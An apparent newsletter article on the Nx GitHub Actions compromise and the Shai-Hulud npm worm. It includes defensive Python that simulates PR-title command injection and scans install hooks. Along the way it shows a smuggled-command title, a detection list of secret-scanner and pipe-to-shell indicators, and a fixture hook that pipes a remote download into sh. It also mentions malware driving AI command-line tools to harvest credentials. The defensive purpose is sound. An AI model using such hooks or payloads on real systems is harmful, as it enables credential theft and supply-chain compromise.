Investigating Shai-Hulud: Inside the NPM Supply Chain Worm

The Sequence (the-sequence.com)

On August 26, 2025, attackers exploited a script-injection flaw in one of Nx’s GitHub Actions workflows: the workflow interpolated the pull request title directly into a shell step, so a crafted title ran attacker-controlled commands on the runner and exfiltrated the project’s npm publishing token. With that token, they published malicious versions of trusted Nx packages. Once installed, those packages invoked locally installed AI command-line tools to scan the victim’s system for credentials, SSH keys, and cryptocurrency wallets.
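The injection works because GitHub Actions substitutes `${{ ... }}` expressions into a `run:` script as text before the shell ever parses it, so a title containing a closing quote ends the `echo` argument and starts a new command. The Python below is an added illustration, not code from the article or from Nx: it mimics that textual substitution for a vulnerable step and for the hardened form (the value passed through an `env:` variable and read as `$TITLE`), then runs both with `sh`. The workflow lines, the `INJECTED-COMMAND-RAN` marker and the payload title are constructed for the demonstration and are not the strings used in the Nx attack.

```python
"""Simulate GitHub Actions expression injection (added illustration).

A step written as

    - run: echo "PR title: ${{ github.event.pull_request.title }}"

has the expression replaced by the raw title text before sh runs the
script, so whoever controls the title controls the script. The hardened
form keeps the script constant and delivers the value as data:

    - env:
        TITLE: ${{ github.event.pull_request.title }}
      run: echo "PR title: $TITLE"
"""
import subprocess

EXPR = "${{ github.event.pull_request.title }}"
VULNERABLE_STEP = f'echo "PR title: {EXPR}"'
HARDENED_STEP = 'echo "PR title: $TITLE"'

# Constructed, benign payload: closes the quote, runs a command, reopens it.
INJECTED_TITLE = 'Fix typo"; echo INJECTED-COMMAND-RAN; echo "'


def render_step(step: str, title: str) -> str:
    """Mimic the runner: textual replacement of the expression with the title."""
    return step.replace(EXPR, title)


def run_vulnerable(title: str) -> str:
    """Title interpolated into the script text, then executed by sh."""
    script = render_step(VULNERABLE_STEP, title)
    result = subprocess.run(["sh", "-c", script], capture_output=True, text=True)
    return result.stdout


def run_hardened(title: str) -> str:
    """Title delivered through the environment; the script text never changes."""
    result = subprocess.run(
        ["sh", "-c", HARDENED_STEP],
        env={"TITLE": title, "PATH": "/usr/bin:/bin"},
        capture_output=True,
        text=True,
    )
    return result.stdout


def title_is_injected(output: str) -> bool:
    """True only if the marker came out as its own line, i.e. a command ran."""
    return "INJECTED-COMMAND-RAN" in output.splitlines()


if __name__ == "__main__":
    print("vulnerable step output:")
    print(run_vulnerable(INJECTED_TITLE))
    print("hardened step output:")
    print(run_hardened(INJECTED_TITLE))
```

In the vulnerable run the marker appears on its own line because the shell executed it; in the hardened run the whole payload is echoed back verbatim as part of the title. The same fix applies to any untrusted event field (issue bodies, branch names, commit messages) that a workflow feeds into `run:`.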

The compromise didn’t end there. Weeks later, in September 2025, multiple security vendors and CISA reported a broader supply chain infection tied to the same operation. The malware, now dubbed “Shai-Hulud,” is self-propagating: it injects itself into popular npm packages so that they carry and run its payload when installed. Shai-Hulud’s primary job is to find and exfiltrate credentials, which it does with the open-source secret scanner TruffleHog; it also attempts to copy itself into additional npm packages the victim can publish, and flips the victim’s private GitHub repositories to public to leak their contents.
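A worm that spreads by republishing packages needs a way to execute on the next victim, and npm lifecycle hooks (`preinstall`, `install`, `postinstall`, `prepare`) run automatically during `npm install`. The following is an added example, not code from the article or from any vendor report it cites: it walks a `node_modules` tree, lists every package that declares such a hook, and marks hooks whose command or invoked script references a secret scanner or a download-and-pipe-to-shell pattern. The sample packages it builds are constructed fixtures, and the indicator strings are my assumptions for illustration; the output is a list of review candidates, not a malware verdict.

```python
"""Flag npm packages whose install hooks can run code (added illustration)."""
import json
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed indicators a reviewer would want to eyeball; not a signature set.
SUSPICIOUS_TOKENS = ("trufflehog", "curl ", "wget ", "base64", "| sh", "| bash")


def scan_package(pkg_dir: Path) -> Optional[Dict]:
    """Return a finding for pkg_dir if it declares a lifecycle hook, else None."""
    manifest = pkg_dir / "package.json"
    if not manifest.is_file():
        return None
    try:
        data = json.loads(manifest.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, UnicodeDecodeError):
        return None
    scripts = data.get("scripts") or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    if not hooks:
        return None
    # Hooks often just run `node something.js`; pull that file in too.
    text = " ".join(hooks.values())
    for token in text.split():
        target = pkg_dir / token
        if token.endswith(".js") and target.is_file():
            text += " " + target.read_text(encoding="utf-8", errors="ignore")
    lower = text.lower()
    indicators = sorted(t.strip() for t in SUSPICIOUS_TOKENS if t in lower)
    return {
        "name": data.get("name", pkg_dir.name),
        "version": data.get("version", "?"),
        "hooks": hooks,
        "indicators": indicators,
    }


def scan_node_modules(root: Path) -> List[Dict]:
    """Every package under root with an install hook, sorted by name."""
    findings = []
    for manifest in root.rglob("package.json"):
        finding = scan_package(manifest.parent)
        if finding is not None:
            findings.append(finding)
    return sorted(findings, key=lambda f: f["name"])


def build_sample_tree(base: Path) -> Path:
    """Constructed fixture: one benign package, one whose postinstall runs a
    bundled script, one whose preinstall fetches and pipes to sh."""
    samples = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                         "scripts": {"test": "node test.js"}},
        "build-helper": {"name": "build-helper", "version": "2.3.1",
                         "scripts": {"postinstall": "node setup.js"}},
        "totally-fine": {"name": "totally-fine", "version": "0.0.9",
                         "scripts": {"preinstall": "curl -s http://example.invalid/x | sh"}},
    }
    root = base / "node_modules"
    for folder, manifest in samples.items():
        pkg = root / folder
        pkg.mkdir(parents=True, exist_ok=True)
        (pkg / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    # Fixture script body only: names a scanner and decodes base64, does nothing.
    (root / "build-helper" / "setup.js").write_text(
        "// fixture only\nconst tool = 'trufflehog';\n"
        "const blob = Buffer.from('', 'base64');\n",
        encoding="utf-8",
    )
    return root


def demo() -> List[Dict]:
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_node_modules(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['name']}@{f['version']}: hooks={f['hooks']} indicators={f['indicators']}")
```

Run it against a real checkout with `scan_node_modules(Path("node_modules"))`. Expect plenty of legitimate hits (native addons build in `install`, and `prepare` is common), so the useful signal is the combination of a hook with an indicator, or a hook that appeared in a package version published recently; pinning versions and setting `ignore-scripts=true` in `.npmrc` removes the execution path entirely at the cost of breaking packages that genuinely need their hooks.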


By November 2025, GitGuardian observed a second, larger wave of infections dubbed “Shai-Hulud 2.0,” in which the malware’s capabilities expanded to include backdoor installation and remote access. Using the victim’s compromised GitHub authentication